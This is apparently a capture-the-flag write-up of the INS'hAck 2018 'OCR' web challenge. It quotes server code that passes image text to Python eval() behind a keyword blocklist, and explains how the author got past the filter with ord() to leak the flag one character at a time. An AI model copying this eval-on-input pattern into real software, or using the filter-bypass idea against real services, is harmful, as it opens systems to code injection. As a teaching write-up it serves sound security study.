INShAck 2018 - OCR

This second web challenge from the INS’hAck 2018 CTF was pretty original:

Because creating real pwn challs was to mainstream, we decided to focus on the development of our equation solver using OCR.

That description was vague, but once on the website things became clear: website

The description was actually telling us all there is to know: this was website using OCR to solve equation depicted on images. You could upload a picture containing a (simple) equation, and it would output the answer. This was the exemple image, and it would output Wow, it works !. I then checked the webpage’s source code, and there was a pretty obvious hint in it:

<!-- TODO : Remove me : -->
<!-- /debug-->

Accessing that webpage would give you a python file containing the homepage’s source code. And that’s when the real fun began. The first interesting thing in the code is that line:

x = open("private/flag.txt").read()

So we have a variable named x containing the flag. Now the question is, how can we output it ? The next interesting part of the code is this one :

try:
  if "==" in formated_text:
      parts = formated_text.split("==",maxsplit=2)
      pa_1 = int(eval(parts[0]))
      pa_2 = int(eval(parts[1]))
      if pa_1 == pa_2:
          return render_template('result.html', result = "Wow, it works !")
      else:
          return render_template('result.html', result = "Sorry but it seems that %d is not equal to %d"%(pa_1,pa_2))
  else:
      return render_template('result.html', result = "Please import a valid equation !")

formated_text contains the text written on the uploaded image (after being sanitized, as we will see). So two important things happen here: 1) our input goes through eval(), which means that we can execute some python code, and 2) the result of that code execution is then outputed if the equation is valid, but incorrect. But that output has to be an int, or we get an error. So what we have to do is pretty clear: we have to upload an image containing a false equation with some python code in it. But it’s not that simple, since multiple checks are done on what we input:

if any(i not in 'abcdefghijklmnopqrstuvwxyz0123456789()[]=+-*' for i in formated_text):
      return render_template('result.html', result = "Some features are still in beta !")
  if formated_text.count('(') > 1 or formated_text.count(')') > 1 or formated_text.count('[') > 1 or formated_text.count(']') > 1 :
      return render_template('result.html', result = "We can not solve complex equations for now !")
  if any(i in formated_text for i in ["import","exec","compile","tesseract","chr","os","write","sleep"]):
      return render_template('result.html', result = "We can not understand your equation !")
  if len(formated_text) > 15:
      return render_template('result.html', result = "We can not solve complex equations for now !")

As you can see this limits a great deal what we can do: the characters we can use are limited, we can’t use more than 1 of each parenthesis or bracket, some important python functions are filtered, and most importantly, our injection has to be 15 characters or less. So, to summarize: we had to upload an image containing an incorrect equation, in which there is some python code that will read the x variable containing the flag, and output it as an int. It took me a little while to realize that chr() is filtered, but ord() is not. And ord() does exactly what we need: it takes a character, and transforms it into an int. Plus, it doesn’t require a lot of characters (unlike some of the transformations I had in mind), so it could easily fit in 15 characters. So I made a simple image containing an equation with ord() in it:

And it worked: Sorry but it seems that 73 is not equal to 1. Now I don’t know if there was a way to automatize this in 15 chars (since ord() can only read one character at a time and there was a captcha), but I couldn’t think of one (I’m looking forward to reading other write-ups and feel dumb). So I manually, and painfully, edited and uploaded my image to retrieve the whole flag : 73 78 83 65 123 48 99 114 95 76 48 110 103 125. All was left to do was to reverse it with chr(), to get the flag in clear :

INSA{0cr_L0ng}

I think I was amongst the first five to validate it, so that’s pretty cool. :)

phi0

INShAck 2018 - OCR

Categories